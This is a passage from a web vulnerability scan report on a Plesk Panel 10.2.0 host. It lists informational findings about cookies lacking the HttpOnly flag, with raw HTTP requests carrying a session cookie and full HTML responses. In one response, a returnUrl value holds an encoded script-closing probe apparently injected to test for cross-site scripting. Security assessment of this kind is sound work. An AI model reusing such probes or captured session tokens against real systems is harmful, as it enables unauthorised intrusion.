</div>
</form>
</div>
</div>
</div>
</div>
</div>
</div>
<div id="footer-wrapper" class="login-footer">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; 1999-2011, Parallels. All rights reserved.</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.8. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/backup/local-repository/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/backup/local-repository/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/backup/local-repository/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/account/show/id/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:17:53 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:17:55 GMT
Connection: close
Content-Length: 19117

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252Fbackup%252F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fbackup%252Flocal-repository%252F%26src%3D%252Fsmb%252Faccount%26srcController%3DAccountController' + '&activeModule=' + 'account' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"active","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Backup Manager</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/client.backup.local-repository/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/hosting-panel=account.index/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/backup/local-repository/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
   <input type="hidden" name="cmd" value="update">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   <div class="toolsArea">
   <fieldset>
   <legend>Tools</legend>
   <table width="100%" cellspacing="0" cellpadding="0" border="0">
   <tr><td>
       <div class="screenButtons">
           <DIV class="commonButton" id="bid-backup-now" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Back up your account configuration and your domains.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/backup/create/&#039;); return false;" style=""><BUTTON name="bname_backup-now" id="buttonid-backup-now" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/backup/create/&#039;); return false;">Back Up</BUTTON><SPAN id="spanid-backup-now">Back Up</SPAN></DIV>
           <DIV class="commonButton" id="bid-backup-schedule" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Specify settings for scheduled backup.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/backup/schedule/&#039;); return false;" style=""><BUTTON name="bname_backup-schedule" id="buttonid-backup-schedule" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/backup/schedule/&#039;); return false;">Scheduled Backup Settings</BUTTON><SPAN id="spanid-backup-schedule">Scheduled Backup Settings</SPAN></DIV>
           <DIV class="commonButton" id="bid-upload" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Upload a backup file from your local computer to the server backup repository.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/backup/local-repository/upload/&#039;); return false;" style=""><BUTTON name="bname_upload" id="buttonid-upload" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/backup/local-repository/upload/&#039;); return false;">Upload Files to Server Repository</BUTTON><SPAN id="spanid-upload">Upload Files to Server Repository</SPAN></DIV>
           <DIV class="commonButton" id="bid-ftp-settings" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Specify settings for your personal remote FTP repository where backup files should be stored.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/backup/ftp-repository/properties/&#039;); return false;" style=""><BUTTON name="bname_ftp-settings" id="buttonid-ftp-settings" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/backup/ftp-repository/properties/&#039;); return false;">Personal FTP Repository Settings</BUTTON><SPAN id="spanid-ftp-settings">Personal FTP Repository Settings</SPAN></DIV>
           
           <DIV class="commonButton" id="bid-refresh" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Refresh data on the screen.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/backup/local-repository/&#039;); return false;" style=""><BUTTON name="bname_refresh" id="buttonid-refresh" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/backup/local-repository/&#039;); return false;">Refresh</BUTTON><SPAN id="spanid-refresh">Refresh</SPAN></DIV>
       </div>
   </td></tr>
   </table>
   </fieldset>
</div>

<div class="listArea">
   <fieldset>
       <legend>Backups</legend>
       <table width="100%" cellspacing="0" cellpadding="0" border="0">
       <tr><td>
           <div id="screenTabs"><div id="tabs"><ul><li class="first" id="current"><A href="/plesk/client@2/backup/local-repository/" onClick=";lon();"><span>Server Repository</span></a></li><li><A href="/plesk/client@2/backup/ftp-repository/" onClick=";lon();"><span>Personal FTP Repository</span></a></li><li class="last"><A href="/plesk/client@2/backup/task@/" onClick=";lon();"><span>Current Backup Tasks</span></a></li></ul></div></div>
       </td></tr>
       <tr><td>
           <div id="list">
               <script>
           function a(event) {tooltip.set(event, [{"type":"string","string":"This is a valid backup. Data can be restored from this backup."}]);}
           function b(event) {tooltip.set(event, [{"type":"string","string":"This is not a valid backup. Data cannot be restored from this file."}]);}
       </script><div class="paging pagingTop noList">No backups</div><div class="paging pagingBottom noList"></div><script>SetCookie("backuplocalrepositorylist", "YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9");
           function BackupLocalRepositoryListSetPaging(page)
           {
               var f = document.forms[0];
               f.page.value = page;
               f.cmd.value = "setPage";
               lsubmit(f);
               return false;
           }

           function BackupLocalRepositoryListSetPageSize(page_size)
           {
               var f = document.forms[0];
               f.page_size.value = page_size;
               f.cmd.value = "setPageSize";
               lsubmit(f);
               return false;
           }
       
           function BackupLocalRepositoryListSelectionGet()
           {
               var f = document.forms[0];
               var selection = new Array();
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled) && f.elements[i].checked) {
                           selection.push(f.elements[i].value);
                       }
                   }
               }
               return selection;
           }
           function BackupLocalRepositoryListSelect()
           {
               f = document.forms[0];
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled)) {
                           f.elements[i].checked = f.BackupLocalRepositoryListSelectAll.checked;
                           BackupLocalRepositoryListSelectOnChange(f.elements[i]);
                       }
                   }
               }
               return true;
           }
       
           function BackupLocalRepositoryListSelectOnChange(o)
           {
               o = $(o);
               if ("radio" == o.type) {
                   $$("input[name='" + o.name + "']").each(function(el){
                       el.up("tr").removeClassName("selected");
                   });
               }

               if (o.checked)
                   o.up("tr").addClassName("selected");
               else
                   o.up("tr").removeClassName("selected");

               return true;
           }
       
           function BackupLocalRepositoryListSort(sort)
           {
               f = document.forms[0];
               f.sort.value = sort;
               f.cmd.value = "setSort";
               lsubmit(f);
               return false;
           }
       
           function BackupLocalRepositoryListFilter(f)
           {
               
               if (f.filter.value.length == 0) {
                   BackupLocalRepositoryListShowAll(f);
                   return false;
               }
       
               f.cmd.value = "setFilter";
               lsubmit(f);
               return false;
           }
       
           function BackupLocalRepositoryListShowAll(f)
           {
               f.cmd.value = "clearFilter";
               lsubmit(f);
               return false;
           }
       
           function BackupLocalRepositoryListSearchShow()
           {
               var sc = document.getElementById("BackupLocalRepositoryListSearchControl");
               if (sc) {
                   removeClass(sc, "hide");
                   addClass(sc, "show");
               }

               var s = document.getElementById("BackupLocalRepositoryListSearch");
               if (s) {
                   removeClass(s, "hide");
                   addClass(s, "show");
               }

               SetPermanentCookie("cListShowSearch", 1);
           }
       
           function BackupLocalRepositoryListSearchHide()
           {
               var sc = document.getElementById("BackupLocalRepositoryListSearchControl");
               if (sc) {
                   removeClass(sc, "show");
                   addClass(sc, "hide");
               }

               var s = document.getElementById("BackupLocalRepositoryListSearch");
               if (s) {
                   removeClass(s, "show");
                   addClass(s, "hide");
               }

               SetPermanentCookie("cListShowSearch", 0);
           }
       
           function BackupLocalRepositoryListRemove(f)
           {
               if (0 == BackupLocalRepositoryListSelectionGet().length) {
                   alert("No objects selected.");
                   return false;
               }
               f.cmd.value = "remove";
               f.action = "/plesk/client@2/backup/local-repository/";
               lsubmit(f);
               return false;
           }
       </script>
           </div>
       </td></tr>        
       </table>
   </fieldset>
</div>




</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.9. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/custom-buttons/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/custom-buttons/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/custom-buttons/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/account/show/id/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:19:01 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:19:01 GMT
Connection: close
Content-Length: 16874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%2540%252Fdomain%25401%252Fbackup%252F%2Froot%2F%252Fplesk%252Fclient%2540%252Fdomain%25401%252Fdbbackup%252F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fbackup%252Flocal-repository%252F%26src%3D%252Fsmb%252Fweb%252Fview%26srcController%3DWebControllerf080b%25253c%25252fScRiPt%252520%25253e664f20b0d02' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Links to Additional Services</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/custom_buttons_client/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/hosting-panel=account.index/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/custom-buttons/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
   <input type="hidden" name="cmd" value="update">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   <div class="toolsArea">

<fieldset>

<legend>Tools</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

<div class="screenButtons">
<DIV class="commonButton" id="bid-custom-button-new" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Add a link to an online service and place it in the Panel.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/custom-buttons/custom-button@new/properties/&#039;); return false;" style=""><BUTTON name="bname_custom_button_new" id="buttonid-custom-button-new" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/custom-buttons/custom-button@new/properties/&#039;); return false;">Add Link to Service</BUTTON><SPAN id="spanid-custom-button-new">Add Link to Service</SPAN></DIV>
</div>

</td></tr></table></fieldset>

</div>


<div class="listArea">

<fieldset>

<legend>Links to additional services</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>


           <script>
           function a(event) { tooltip.set(event, [{"type":"string","string":"The link is visible to users."}]); }
           function b(event) { tooltip.set(event, [{"type":"string","string":"The link is not visible to users."}]); }
           function c(event, place) {
               switch (place) {
               case "navigation":
                   tooltip.set(event, [{"type":"string","string":"The link is located on all pages."}]);
                   break;
               case "admin":
                   tooltip.set(event, [{"type":"string","string":"The link is located on the administrator's home page."}]);
                   break;
               case "reseller":
                   tooltip.set(event, [{"type":"string","string":"The link is located on the reseller's home page"}]);
                   break;
               case "client":
                   tooltip.set(event, [{"type":"string","string":"The link is located on the customer's home page."}]);
                   break;
               case "domain":
                   tooltip.set(event, [{"type":"string","string":"The link is located on the Websites & Domains page of the Subscription."}]);
                   break;
               }
           }
           function z() { tooltip.hide(); }
           </script>
       <div class="paging pagingTop noList">No Links to Additional Services</div><div class="paging pagingBottom noList"></div><script>SetCookie("custombuttonslist", "YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9");
           function CustomButtonsListSetPaging(page)
           {
               var f = document.forms[0];
               f.page.value = page;
               f.cmd.value = "setPage";
               lsubmit(f);
               return false;
           }

           function CustomButtonsListSetPageSize(page_size)
           {
               var f = document.forms[0];
               f.page_size.value = page_size;
               f.cmd.value = "setPageSize";
               lsubmit(f);
               return false;
           }
       
           function CustomButtonsListSelectionGet()
           {
               var f = document.forms[0];
               var selection = new Array();
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled) && f.elements[i].checked) {
                           selection.push(f.elements[i].value);
                       }
                   }
               }
               return selection;
           }
           function CustomButtonsListSelect()
           {
               f = document.forms[0];
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled)) {
                           f.elements[i].checked = f.CustomButtonsListSelectAll.checked;
                           CustomButtonsListSelectOnChange(f.elements[i]);
                       }
                   }
               }
               return true;
           }
       
           function CustomButtonsListSelectOnChange(o)
           {
               o = $(o);
               if ("radio" == o.type) {
                   $$("input[name='" + o.name + "']").each(function(el){
                       el.up("tr").removeClassName("selected");
                   });
               }

               if (o.checked)
                   o.up("tr").addClassName("selected");
               else
                   o.up("tr").removeClassName("selected");

               return true;
           }
       
